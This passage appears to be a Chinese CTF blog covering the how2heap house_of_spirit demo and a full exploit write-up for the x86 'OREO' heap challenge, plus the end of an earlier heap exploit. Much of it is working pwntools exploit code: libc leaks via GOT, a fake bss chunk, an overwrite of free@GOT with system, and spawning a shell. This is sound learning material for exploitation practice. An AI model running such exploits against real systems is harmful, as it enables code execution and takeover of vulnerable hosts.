PUT('c',0x68,'no mean'.ljust(0x48,'\x00')+p64(0x200)+p64(libc_base+0x3c4b78)*2+'\x00'*8)

DEL('b')
### Write different one_gadget
#PUT('never',0x68,'\x00'*19+p64(libc_base+0x45216)+'\x00'*77)
PUT('gogogo',0x68,'\x00'*19+p64(libc_base+0x4526a)+'\x00'*77)
#PUT('never',0x68,'\x00'*19+p64(libc_base+0xf02a4)+'\x00'*77)
#PUT('never',0x68,'\x00'*19+p64(libc_base+0xf1147)+'\x00'*77)

# try try try
DEL('gogogo')
#GET('')

p.interactive()

小记

这个堆题应该是目前为止写的时间最长,也是最麻烦的一个堆题,主要是树形结构的逆向很耗时间,然后再off_by_one的构造上也要花不少功夫,合并的内存块前面必须要满足unlink条件,这个就需要精力去考虑一下在这种复杂堆管理下的构造方式,再就是一定要清楚各个模块对chunk操作的顺序,否贼写起来真的毫无头绪。再就是这个leak的方式也是我第一次见,通过unsortedbin指针,既打印了libc的地址又打印了堆的地址,承认这个操作是看师傅们的wp来的,以后一定在leak方面加把劲XD。最后就是玄学树操作,比赛碰到这种一定要不求甚解,只要能不影响漏洞利用就可以了,要不然浪费大量时间。
另外这题师傅们的构造更好一点,师傅们的构造是这样的,0x90加到0x100 chunk之前刚好是0x200的一个chunk

node A dataB rkB rkA dataA nodeB nodeC rkC nodeD rkd(exp) dataC_n dataD
0x40 0x20 0x20 0x20 0x90 0x40 0x40 0x20 0x70 0x40 0x20 0x100 0x20
fastbin1

最后:多撸源码

how2heap - house_of_spirit&OREO

ubuntu 16.04 libc2.23

house_of_spirit.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdio.h>
#include <stdlib.h>

int main()
{
fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
malloc(1);

fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
unsigned long long *a;
// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]);

fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
fake_chunks[1] = 0x40; // this is the size

fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
// fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
fake_chunks[9] = 0x1234; // nextsize

fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
a = &fake_chunks[2];

fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);

fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

基本就是初始化堆之后,在栈上通过伪造一个chunk来free然后malloc出来

记两句吧:

在栈上伪造fake chunk时,next chunk.size要满足条件才能通过free的检查

The chunk.size of the next fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.

fake chunk的地址需要16字节对齐(x64),所以在申请临时变量时才用到了__attribute__ ((aligned (16)))

note that the memory address of the region associated with this chunk must be 16-byte aligned.

Debug

fake chunk伪造完成之后栈上布局如图所示:

free之后:

再次malloc结束之后可以看到RAX中的返回值便是fake chunk的data region

OREO

写了好久的x64 heap这次总算碰到一个x86的 : )

程序分析

(经过分析之后先逆出了结构体和符号)

main函数:

main函数就是一段初始化,然后进入menu

通过fgets(&s, 0x20, stdin);__isoc99_sscanf(&s, "%u", &v1)的组合来输入然后switch

<Rifile structure>

分析下面几个函数时,先逆出程序用到的一个结构体,具体如下

add

具体就是一个链表添加、结构体填充的操作(先填forward_ptr,再输入),全局变量head_ptr存放链表头指针,每次malloc一个refle(fast chunk),然后从对应的位置用fgets输入。两处溢出:refle_name处的溢出可以覆盖到下一个chunk的0x19字节内容,newL_to_zero是将最后的换行符换成\x00,最后++refle_num

ps:fgets(,n,)时会读取 n-1个字符,并且包括 \n,如果输入字符的长度(不包括 \n)大于等于 n-1,则截取输入中前 n-1个字符(此时没有 \n)并把第 n个字符处填充成 \x00。当输入长度小于 n-1时,会把 \n也读入,并在 \n后面一个字节处填充 \x00(直接回车也会)

Show added rifles

根据链表输出所有refle的内容

order

判断refle_num是否为0,不为0则获取链表头指针之后free掉链表上的每一个chunk,然后把头指针head_ptr置零,chunk中的forward_refle_ptr没有置零。然后++ordered_num

leave_message

输入0x80长度的notice到notice_ptr所指向的区域

show_stats

输出refle_numordered_numnotice

Exploit

程序本身没有进行 setbuf 操作,所以在执行输入输出操作的时候会申请缓冲区,初次调用 puts 时,malloc会分配缓冲区1024B 给stdout / 初次调用fgets时,malloc会分配缓冲区1024B 给stdin

所以一上来程序heap视图中就会有两个chunk,暂时觉得是知道怎么来的就好了 :(

这种链表题第一次自己写好像没有思路,先记录一下能想到东西吧

leak:

leak libc的话,主要思路是通过溢出修改forward_ptr,使其指向对应GOT表的一些偏移,然后show added rifles时可以把函数的地址打印出来,leak chunk地址也可以通过这个方法,把forward_ptr改成head_ptr地址即可

leak stack好像行不通…

Arbitrary write:

程序只有三个输入点

  1. switch时调用的fgetssscanf组合(应该没什么用,输入指针都是栈上的偏移)
  2. add中的fgets,指针是对于结构体(chunk)的偏移,但是head_ptr的值在其中不可控,是malloc返回后直接输入的
  3. leave_message中的fgets(notice_ptr, 0x80, stdin);这个是根据bss段上的一个指针来读取内容的

ps:然后……过了好久终于才把house_of_spirit和这个题结合起来,我太stupid了

可以通过修改forward_ptr,指向一个bss段上有我们可控值的地方

举例子拿上面第一个个8B对齐的地址来说,如果我们add一个chunk然后修改forward_ptr指向这里,此时0x0804A29c处的值就是fake chunk的size字段,当然这里不可控所以我们要用第二个:0x0804A2A0,此时refle_num是可控的。

然后order的时候这块内存也会被free出来,只要我们保证house_of_spirit.c中提到的fake next chunk的size段是正常的就可以被正常free(对应的size段在notice上,对应在notice上的偏移为:0x0804A2A0+0x40+4-0x0x0804A2C0=36)

接着这块内存就可以被正常malloc出来,这个时候就有了可控的notice_ptr,然后再通过leave_message就可以达成Arbitrary write了!(自己花时间想出来了太开心 XD)

实现

leaklibc

1
2
3
4
5
6
7
8
9
printf_GOT=0x0804A234
libc_base=0
def leaklibc():
add('a'*27+p32(printf_GOT),'b'*0x23)#change forward_ptr by refle_name
show_added_rifles()
p.recvuntil('Description: ')
p.recvuntil('Description: ')
global libc_base
libc_base=my_u32(p.recv(4))-0x49670

free target chunk

1
2
3
4
5
6
7
8
9
#Cycle to fakesize=0x3f
for i in range(0x3f):
add('name','description')
order()

leave_message('\x00'*36+p32(0x41))#Set fake next chunk size

add('a'*27+p32(0x0804A2A8),'b'*0x23)
order()#Free our bss memory out

先add 0x3f个rifle然后order,目标chunk的size被设置成0x3f,然后构造fake next size来过free的检查,接着再add一个forward_ptr为目标chunk的rifle,此时目标chunk的size为0x40,然后free出目标chunk

set GOT

1
2
3
4
5
6
7
log.info("\033[1;36m" + 'free out' + "\033[0m")
add('name',p32(free_GOT))#Set notice_ptr to free_GOT

leaklibc()#Now leak libc
log.info("\033[1;36m" + 'libc_base:'+hex(libc_base) + "\033[0m")

leave_message(p32(system_offset+libc_base)+p32(fgets_offset+libc_base))#Set free_GOT to system

再次malloc的时候就可以把目标chunk malloc出来了,然后直接在notice_ptr处填入free函数的GOT表地址

接着将system函数的实际地址填到free_GOT去

ps:leaklibc的操作要放到后面,要不然前面 leak之后再调用 order会出错,以及这里 free函数和 fgets的 GOT表项挨在一起,用 fgets 只填入 system 函数地址的话 fgets 的 GOT表项会被损坏(具体见前面所写的 fgets流程),程序往后运行会出错,所以这里填了两个

getshell

1
2
add('/bin/sh','/bin/sh')#Set /bin/sh for system(linked list head)
order()#free(head_ptr)=system(binsh_ptr)

这个应该不用解释了

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './oreo' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")

# todo here
def add(name,description):
p.recvuntil('Action: ')
p.sendline('1')

p.recvuntil('Rifle name: ')
p.sendline(name)

p.recvuntil('Rifle description: ')
p.sendline(description)

def show_added_rifles():
p.recvuntil('Action: ')
p.sendline('2')

def order():
p.recvuntil('Action: ')
p.sendline('3')

def leave_message(notice):
p.recvuntil('Action: ')
p.sendline('4')

p.recvuntil('your order: ')
p.sendline(notice)

def show_stats():
p.recvuntil('Action: ')
p.sendline('5')

printf_GOT=0x0804A234
libc_base=0
system_offset=0x3ada0
free_GOT=0x0804A238
fgets_offset=0x5e150
def leaklibc():
add('a'*27+p32(printf_GOT),'b'*0x23)
show_added_rifles()
p.recvuntil('Description: ')
p.recvuntil('Description: ')
global libc_base
libc_base=my_u32(p.recv(4))-0x49670

#Cycle to fakesize=0x3f
for i in range(0x3f):
add('name','description')
order()

leave_message('\x00'*36+p32(0x41))#Set fake next chunk size

add('a'*27+p32(0x0804A2A8),'b'*0x23)
order()#Free our bss memory out

log.info("\033[1;36m" + 'free out' + "\033[0m")
add('name',p32(free_GOT))#Set notice_ptr to free_GOT

leaklibc()#Now leak libc
log.info("\033[1;36m" + 'libc_base:'+hex(libc_base) + "\033[0m")

leave_message(p32(system_offset+libc_base)+p32(fgets_offset+libc_base))#Set free_GOT to system
add('/bin/sh','/bin/sh')#Set /bin/sh for system (linked list head)
order()#free(head_ptr)=system(binsh_ptr)
#getshell
p.interactive()